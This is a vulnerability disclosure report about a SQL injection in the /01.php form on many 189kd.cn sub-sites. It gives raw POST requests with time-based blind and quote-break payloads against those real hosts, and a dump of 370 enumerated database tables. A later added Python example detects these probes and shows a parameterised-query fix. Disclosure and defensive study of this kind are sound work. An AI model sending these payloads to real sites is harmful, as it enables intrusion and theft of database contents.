Vulnerability Summary
Vulnerability Details
Disclosure status:
2015-06-09: Details sent to the vendor, awaiting vendor handling
2015-06-12: Vendor has confirmed; details disclosed to the vendor only
2015-06-22: Details disclosed to core white hats and experts in related fields
2015-07-02: Details disclosed to regular white hats
2015-07-12: Details disclosed to intern white hats
2015-07-27: Details disclosed to the public
Brief description:
A SQL injection shared across multiple sub-sites; the sites appear to have already been compromised.
Details:
Affected sites (partial list):
http://www.189kd.cn:80/
http://cz.189kd.cn:80/
http://hz.189kd.cn:80/
http://zh.189kd.cn:80/
http://sz.189kd.cn:80/
http://fs.189kd.cn:80/
http://dg.189kd.cn:80/
http://zs.189kd.cn:80/
http://mz.189kd.cn:80/
http://zq.189kd.cn:80/
http://gz.189kd.cn:80/
Main site:
POST /01.php HTTP/1.1
Content-Length: 315
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.189kd.cn:80/
Host: www.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=62&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
Sub-sites:
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zq.189kd.cn/
Host: zq.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=nbnetqxq
POST /01.php HTTP/1.1
Content-Length: 186
Content-Type: application/x-www-form-urlencoded
Referer: http://dg.189kd.cn/
Host: dg.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=19&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=
There are many more... not listing them one by one.
Pasting the main site's table list..
Database: kuandai_189kd
[370 tables]
+-----------------------+
| v9_admin              |
| v9_admin_panel        |
| v9_admin_role         |
| v9_admin_role_priv    |
| v9_announce           |
| v9_attachment         |
| v9_attachment_index   |
| v9_badword            |
| v9_bank               |
| v9_block              |
| v9_block_history      |
| v9_block_priv         |
| v9_cache              |
| v9_category           |
| v9_category_copy      |
| v9_category_priv      |
| v9_chanpin            |
| v9_chanpin_data       |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node    |
| v9_collection_program |
| v9_comment            |
| v9_comment_check      |
| v9_comment_data_1     |
| v9_comment_setting    |
| v9_comment_table      |
| v9_content_check      |
| v9_copyfrom           |
| v9_cz_news            |
| v9_cz_news_data       |
| v9_cz_picture         |
| v9_cz_picture_data    |
| v9_cz_product         |
| v9_cz_product_data    |
| v9_datacall           |
| v9_dbsource           |
| v9_dg_news            |
| v9_dg_news_data       |
| v9_dg_picture         |
| v9_dg_picture_data    |
| v9_dg_product         |
| v9_dg_product_data    |
| v9_download           |
| v9_download_data      |
| v9_downservers        |
| v9_dxpd               |
| v9_dxpd_data          |
| v9_extend_setting     |
| v9_favorite           |
| v9_fs_news            |
| v9_fs_news_data       |
| v9_fs_picture         |
| v9_fs_picture_data    |
| v9_fs_product         |
| v9_fs_product_data    |
| v9_gz_news            |
| v9_gz_news_data       |
| v9_gz_picture         |
| v9_gz_picture_data    |
| v9_gz_product         |
| v9_gz_product_data    |
| v9_hits               |
| v9_hn_news            |
| v9_hn_news_data       |
| v9_hn_product         |
| v9_hn_product_data    |
| v9_hncd_news          |
| v9_hncd_news_data     |
| v9_hncd_product       |
| v9_hncd_product_data  |
| v9_hncs_news          |
| v9_hncs_news_data     |
| v9_hncs_product       |
| v9_hncs_product_data  |
| v9_hncz_news          |
| v9_hncz_news_data     |
| v9_hncz_product       |
| v9_hncz_product_data  |
| v9_hnhh_news          |
| v9_hnhh_news_data     |
| v9_hnhh_product       |
| v9_hnhh_product_data  |
| v9_hnhy_news          |
| v9_hnhy_news_data     |
| v9_hnhy_product       |
| v9_hnhy_product_data  |
| v9_hnld_news          |
| v9_hnld_news_data     |
| v9_hnld_product       |
| v9_hnld_product_data  |
| v9_hnsy_news          |
| v9_hnsy_news_data     |
| v9_hnsy_product       |
| v9_hnsy_product_data  |
| v9_hnxt_news          |
| v9_hnxt_news_data     |
| v9_hnxt_product       |
| v9_hnxt_product_data  |
| v9_hnyiy_news         |
| v9_hnyiy_news_data    |
| v9_hnyiy_product      |
| v9_hnyiy_product_data |
| v9_hnyy_news          |
| v9_hnyy_news_data     |
| v9_hnyy_product       |
| v9_hnyy_product_data  |
| v9_hnyz_news          |
| v9_hnyz_news_data     |
| v9_hnyz_product       |
| v9_hnyz_product_data  |
| v9_hnzjj_news         |
| v9_hnzjj_news_data    |
| v9_hnzjj_product      |
| v9_hnzjj_product_data |
| v9_hnzz_news          |
| v9_hnzz_news_data     |
| v9_hnzz_product       |
| v9_hnzz_product_data  |
| v9_hnzzz_news         |
| v9_hnzzz_news_data    |
| v9_hnzzz_product      |
| v9_hnzzz_product_data |
| v9_hy_news            |
| v9_hy_news_data       |
| v9_hy_picture         |
| v9_hy_picture_data    |
| v9_hy_product         |
| v9_hy_product_data    |
| v9_hz_news            |
| v9_hz_news_data       |
| v9_hz_picture         |
| v9_hz_picture_data    |
| v9_hz_product         |
| v9_hz_product_data    |
| v9_ipbanned           |
| v9_jm_news            |
| v9_jm_news_data       |
| v9_jm_picture         |
| v9_jm_picture_data    |
| v9_jm_product         |
| v9_jm_product_data    |
| v9_js_news            |
| v9_js_news_data       |
| v9_js_picture         |
| v9_js_picture_data    |
| v9_js_product         |
| v9_js_product_data    |
| v9_jscz_news          |
| v9_jscz_news_data     |
| v9_jscz_picture       |
| v9_jscz_picture_data  |
| v9_jsdx_news          |
| v9_jsdx_news_data     |
| v9_jsdx_picture       |
| v9_jsdx_picture_data  |
| v9_jsha_news          |
| v9_jsha_news_data     |
| v9_jsha_product       |
| v9_jsha_product_data  |
| v9_jslyg_news         |
| v9_jslyg_news_data    |
| v9_jslyg_product      |
| v9_jslyg_product_data |
| v9_jsnt_news          |
| v9_jsnt_news_data     |
| v9_jsnt_product       |
| v9_jsnt_product_data  |
| v9_jssq_news          |
| v9_jssq_news_data     |
| v9_jssq_product       |
| v9_jssq_product_data  |
| v9_jssz_news          |
| v9_jssz_news_data     |
| v9_jssz_product       |
| v9_jssz_product_data  |
| v9_jstz_news          |
| v9_jstz_news_data     |
| v9_jstz_product       |
| v9_jstz_product_data  |
| v9_jswx_news          |
| v9_jswx_news_data     |
| v9_jswx_picture       |
| v9_jswx_picture_data  |
| v9_jsxz_news          |
| v9_jsxz_news_data     |
| v9_jsxz_picture       |
| v9_jsxz_picture_data  |
| v9_jsyc_news          |
| v9_jsyc_news_data     |
| v9_jsyc_product       |
| v9_jsyc_product_data  |
| v9_jsyz_news          |
| v9_jsyz_news_data     |
| v9_jsyz_product       |
| v9_jsyz_product_data  |
| v9_jszj_news          |
| v9_jszj_news_data     |
| v9_jszj_product       |
| v9_jszj_product_data  |
| v9_jy_news            |
| v9_jy_news_data       |
| v9_jy_picture         |
| v9_jy_picture_data    |
| v9_jy_product         |
| v9_jy_product_data    |
| v9_keylink            |
| v9_keyword            |
| v9_keyword_data       |
| v9_link               |
| v9_linkage            |
| v9_log                |
| v9_member             |
| v9_member_detail      |
| v9_member_group       |
| v9_member_menu        |
| v9_member_verify      |
| v9_member_vip         |
| v9_menu               |
| v9_message            |
| v9_message_data       |
| v9_message_group      |
| v9_mm_news            |
| v9_mm_news_data       |
| v9_mm_picture         |
| v9_mm_picture_data    |
| v9_mm_product         |
| v9_mm_product_data    |
| v9_model              |
| v9_model_field        |
| v9_module             |
| v9_mood               |
| v9_mz_news            |
| v9_mz_news_data       |
| v9_mz_picture         |
| v9_mz_picture_data    |
| v9_mz_product         |
| v9_mz_product_data    |
| v9_news               |
| v9_news_data          |
| v9_nj_news            |
| v9_nj_news_data       |
| v9_nj_picture         |
| v9_nj_picture_data    |
| v9_nj_product         |
| v9_nj_product_data    |
| v9_page               |
| v9_pay_account        |
| v9_pay_payment        |
| v9_pay_spend          |
| v9_picture            |
| v9_picture_data       |
| v9_position           |
| v9_position_data      |
| v9_poster             |
| v9_poster_201409      |
| v9_poster_201410      |
| v9_poster_201411      |
| v9_poster_201504      |
| v9_poster_space       |
| v9_queue              |
| v9_release_point      |
| v9_search             |
| v9_search_keyword     |
| v9_session            |
| v9_sg_news            |
| v9_sg_news_data       |
| v9_sg_picture         |
| v9_sg_picture_data    |
| v9_sg_product         |
| v9_sg_product_data    |
| v9_sh_news            |
| v9_sh_news_data       |
| v9_sh_picture         |
| v9_sh_picture_data    |
| v9_sh_product         |
| v9_sh_product_data    |
| v9_shouji             |
| v9_shouji_data        |
| v9_site               |
| v9_sms_report         |
| v9_special            |
| v9_special_c_data     |
| v9_special_content    |
| v9_sphinx_counter     |
| v9_sso_admin          |
| v9_sso_applications   |
| v9_sso_members        |
| v9_sso_messagequeue   |
| v9_sso_session        |
| v9_sso_settings       |
| v9_st_news            |
| v9_st_news_data       |
| v9_st_picture         |
| v9_st_picture_data    |
| v9_st_product         |
| v9_st_product_data    |
| v9_sw_news            |
| v9_sw_news_data       |
| v9_sw_picture         |
| v9_sw_picture_data    |
| v9_sw_product         |
| v9_sw_product_data    |
| v9_sz_news            |
| v9_sz_news_data       |
| v9_sz_picture         |
| v9_sz_picture_data    |
| v9_sz_product         |
| v9_sz_product_data    |
| v9_sz_shouji          |
| v9_sz_shouji_data     |
| v9_tag                |
| v9_template_bak       |
| v9_times              |
| v9_type               |
| v9_urlrule            |
| v9_video              |
| v9_video_content      |
| v9_video_data         |
| v9_video_store        |
| v9_vote_data          |
| v9_vote_option        |
| v9_vote_subject       |
| v9_wap                |
| v9_wap_type           |
| v9_workflow           |
| v9_yf_news            |
| v9_yf_news_data       |
| v9_yf_picture         |
| v9_yf_picture_data    |
| v9_yf_product         |
| v9_yf_product_data    |
| v9_yj2_news           |
| v9_yj2_news_data      |
| v9_yj2_picture        |
| v9_yj2_picture_data   |
| v9_yj2_product        |
| v9_yj2_product_data   |
| v9_yj_news            |
| v9_yj_news_data       |
| v9_yj_picture         |
| v9_yj_picture_data    |
| v9_yj_product         |
| v9_yj_product_data    |
| v9_zh_news            |
| v9_zh_news_data       |
| v9_zh_picture         |
| v9_zh_picture_data    |
| v9_zh_product         |
| v9_zh_product_data    |
| v9_zj_news            |
| v9_zj_news_data       |
| v9_zj_picture         |
| v9_zj_picture_data    |
| v9_zj_product         |
| v9_zj_product_data    |
| v9_zq_news            |
| v9_zq_news_data       |
| v9_zq_picture         |
| v9_zq_picture_data    |
| v9_zq_product         |
| v9_zq_product_data    |
| v9_zs_news            |
| v9_zs_news_data       |
| v9_zs_picture         |
| v9_zs_picture_data    |
| v9_zs_product         |
| v9_zs_product_data    |
| v9_zxd                |
| v9_zxxd               |
+-----------------------+
Not going any further...
Proof of vulnerability:
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://mz.189kd.cn/
Host: mz.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zq.189kd.cn/
Host: zq.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=nbnetqxq
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zs.189kd.cn/
Host: zs.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=urquxvdx
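The requests above all hit the same injection point: the `cid` and `username` fields of the POST body to `/01.php` are spliced into a SQL statement, so a `'"` pair produces a database error and the `if(now()=sysdate(),sleep(0),0)` expression is evaluated by MySQL. The Python below is an added example, not code from the report or from the affected site. It does two defender-side things: it decodes form bodies shaped like the ones in the report (constructed samples, not captured traffic) and flags the probe patterns that appear on this page, and it shows the string-concatenation defect next to the parameterised fix. `sqlite3` stands in for MySQL, so the MySQL-only `sleep()`/`now()`/`sysdate()` functions are not exercised; the table name `v9_category` is taken from the dump above, and its columns are assumed.

```python
"""Added example (not part of the original report): probe detection for
form bodies and a concatenated-vs-parameterised query comparison."""
import re
import sqlite3
from urllib.parse import parse_qsl

# Constructed sample bodies in the shape of the report's requests; the values
# are made up for this demonstration.
SAMPLE_BODIES = {
    "benign": "address=3137%20Laguna%20Street&bank=0&cid=62&username=alice",
    "quote_probe": "address=3137%20Laguna%20Street&bank=0&cid=1'%22&username=nbnetqxq",
    "time_based": (
        "address=x&cid=62&username=if(now()%3dsysdate()%2csleep(0)%2c0)"
        "/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22"
        "XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/"
    ),
}

# Probe shapes visible in the report. A lone apostrophe is deliberately not
# flagged: it is legitimate in names and addresses and would drown the log.
PROBE_PATTERNS = {
    "quote_pair": re.compile(r"""'\s*"|"\s*'"""),                # breaks out of ' or " literals
    "mysql_sleep": re.compile(r"\bsleep\s*\(", re.I),            # time-based blind probe
    "now_eq_sysdate": re.compile(r"\bnow\(\)\s*=\s*sysdate\(\)", re.I),
    "inline_comment": re.compile(r"/\*|\*/"),                    # /* ... */ to neutralise the tail
    "xor_keyword": re.compile(r"\bxor\s*\(", re.I),
}


def flag_injection_probes(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body and map each parameter
    to the probe patterns its value matches. Parameters with no hit are omitted."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        matched = [pname for pname, pat in PROBE_PATTERNS.items() if pat.search(value)]
        if matched:
            hits[name] = matched
    return hits


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL database. The table name comes from the
    report's table listing; the columns and rows are assumed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE v9_category (catid INTEGER, catname TEXT)")
    conn.executemany("INSERT INTO v9_category VALUES (?, ?)",
                     [(1, "news"), (62, "broadband")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, cid: str) -> list:
    """The defect: the request value is spliced into the SQL text, so a quote
    inside ``cid`` changes the statement instead of being compared as data."""
    sql = "SELECT catname FROM v9_category WHERE catid = '%s'" % cid
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, cid: str) -> list:
    """The fix: a parameterised query. The value travels separately from the
    SQL text, so ``1'"`` is compared as a literal string and matches nothing."""
    sql = "SELECT catname FROM v9_category WHERE catid = ?"
    return [row[0] for row in conn.execute(sql, (cid,))]


def concatenated_query_error(conn: sqlite3.Connection, cid: str):
    """Return the database error the concatenated query raises for ``cid``, or
    None when it runs cleanly. An error on the ``1'"`` input is the symptom the
    report's ``cid=1'%22`` requests expose."""
    try:
        lookup_vulnerable(conn, cid)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, flag_injection_probes(body))
    conn = demo_db()
    print("safe lookup for 62:", lookup_safe(conn, "62"))
    print("safe lookup for probe:", lookup_safe(conn, "1'\""))
    print("concatenated query error:", concatenated_query_error(conn, "1'\""))
```

The detection half is meant to run over decoded POST bodies from access or WAF logs; matching on the decoded value matters because the report's payloads arrive percent-encoded (`%22`, `%3d`, `%2c`), and matching on the raw body would miss them. The fix half is the same change the site needs in `/01.php`: bind `cid` and `username` as parameters rather than concatenating them into the statement.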
Fix recommendation:
Copyright notice: please credit the source when reposting: 新生@乌云
Vulnerability Response
Vendor response:
Severity: High
Vulnerability Rank: 14
Confirmed at: 2015-06-12 19:13
Vendor reply:
CNVD has confirmed and reproduced the described situation and has forwarded it via CNCERT to China Telecom Group Corporation, which will coordinate follow-up handling by the website management department.
Latest status:
None yet